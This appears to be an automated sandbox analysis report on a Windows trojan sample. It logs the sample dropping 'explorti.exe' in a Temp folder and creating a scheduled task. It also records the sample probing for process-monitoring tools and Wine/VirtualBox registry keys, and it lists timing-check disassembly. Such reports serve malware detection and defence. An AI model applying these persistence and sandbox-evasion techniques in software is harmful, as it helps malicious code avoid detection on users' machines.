Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe

Static file information: File size 1920000 > 1048576

Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe

Static PE information: Raw size of eqezoorp is bigger than: 0x100000 < 0x1a3400

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Unpacked PE file: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe.900000.0.unpack :EW;.rsrc:W;.idata :W; :EW;eqezoorp:EW;vzestrad:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;eqezoorp:EW;vzestrad:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 2.2.explorti.exe.e20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;eqezoorp:EW;vzestrad:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;eqezoorp:EW;vzestrad:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 8.2.explorti.exe.e20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;eqezoorp:EW;vzestrad:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;eqezoorp:EW;vzestrad:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: explorti.exe.0.dr	Static PE information: real checksum: 0x1d73a5 should be: 0x1dceda
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Static PE information: real checksum: 0x1d73a5 should be: 0x1dceda

Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Static PE information: section name:
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Static PE information: section name: .idata
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Static PE information: section name:
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Static PE information: section name: eqezoorp
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Static PE information: section name: vzestrad
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Static PE information: section name: .taggant
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: eqezoorp
Source: explorti.exe.0.dr	Static PE information: section name: vzestrad
Source: explorti.exe.0.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 2_2_00E3D84C push ecx; ret

2_2_00E3D85F

Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Static PE information: section name: entropy: 7.984651828533471
Source: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Static PE information: section name: eqezoorp entropy: 7.952940556000888
Source: explorti.exe.0.dr	Static PE information: section name: entropy: 7.984651828533471
Source: explorti.exe.0.dr	Static PE information: section name: eqezoorp entropy: 7.952940556000888

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe

File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe

File created: C:\Windows\Tasks\explorti.job

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 96F20C second address: 96F213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AF5517 second address: AF5544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 jmp 00007FABC9471C33h 0x0000000c js 00007FABC9471C26h 0x00000012 jmp 00007FABC9471C2Ch 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AF56A3 second address: AF56A8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AF56A8 second address: AF56AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AF5823 second address: AF583E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FABC90CD75Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jg 00007FABC90CD75Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AF59F3 second address: AF59F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AF59F9 second address: AF59FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AF59FD second address: AF5A28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C36h 0x00000007 jng 00007FABC9471C26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 ja 00007FABC9471C26h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AF9951 second address: AF9983 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FABC90CD758h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007FABC90CD761h 0x00000018 jmp 00007FABC90CD75Dh 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AF9983 second address: AF99AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007FABC9471C2Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AF99AD second address: AF99D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD764h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jl 00007FABC90CD764h 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007FABC90CD756h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AF9A17 second address: AF9A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FABC9471C26h 0x0000000a popad 0x0000000b pop ebx 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 mov edx, 2F208977h 0x00000016 push 1DD728BDh 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jmp 00007FABC9471C38h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AF9A4F second address: AF9A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AF9B78 second address: AF9B7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AF9D44 second address: AF9D4E instructions: 0x00000000 rdtsc 0x00000002 ja 00007FABC90CD75Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AF9D4E second address: AF9D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jbe 00007FABC9471C2Ah 0x0000000d nop 0x0000000e xor si, 11A6h 0x00000013 push 00000000h 0x00000015 mov ecx, dword ptr [ebp+122D2D00h] 0x0000001b mov edi, dword ptr [ebp+122D38B9h] 0x00000021 call 00007FABC9471C29h 0x00000026 pushad 0x00000027 push edi 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AF9D80 second address: AF9DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jg 00007FABC90CD756h 0x0000000c jbe 00007FABC90CD756h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007FABC90CD764h 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AF9DB2 second address: AF9DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AF9DB6 second address: AF9DBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AF9DBA second address: AF9DDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FABC9471C30h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AF9DDB second address: AF9DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AF9DEC second address: AF9DF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AF9DF3 second address: AF9E63 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007FABC90CD756h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d mov dword ptr [ebp+122D3901h], esi 0x00000013 push 00000003h 0x00000015 mov ecx, 18BB6F0Ch 0x0000001a pushad 0x0000001b mov dword ptr [ebp+122D1D1Bh], ebx 0x00000021 movzx edx, ax 0x00000024 popad 0x00000025 push 00000000h 0x00000027 jnp 00007FABC90CD75Ch 0x0000002d push 00000003h 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007FABC90CD758h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 0000001Ch 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 and edi, dword ptr [ebp+122D2CF4h] 0x0000004f mov edi, dword ptr [ebp+122D2C30h] 0x00000055 push C75AB2FCh 0x0000005a push eax 0x0000005b push edx 0x0000005c push ebx 0x0000005d push edi 0x0000005e pop edi 0x0000005f pop ebx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AF9E63 second address: AF9EAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 075AB2FCh 0x0000000f jnc 00007FABC9471C2Ch 0x00000015 lea ebx, dword ptr [ebp+1245E895h] 0x0000001b mov edi, dword ptr [ebp+122D3465h] 0x00000021 jmp 00007FABC9471C2Ah 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FABC9471C34h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AF9EAB second address: AF9EB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FABC90CD756h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B1A28E second address: B1A29D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push edx 0x00000007 jbe 00007FABC9471C2Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
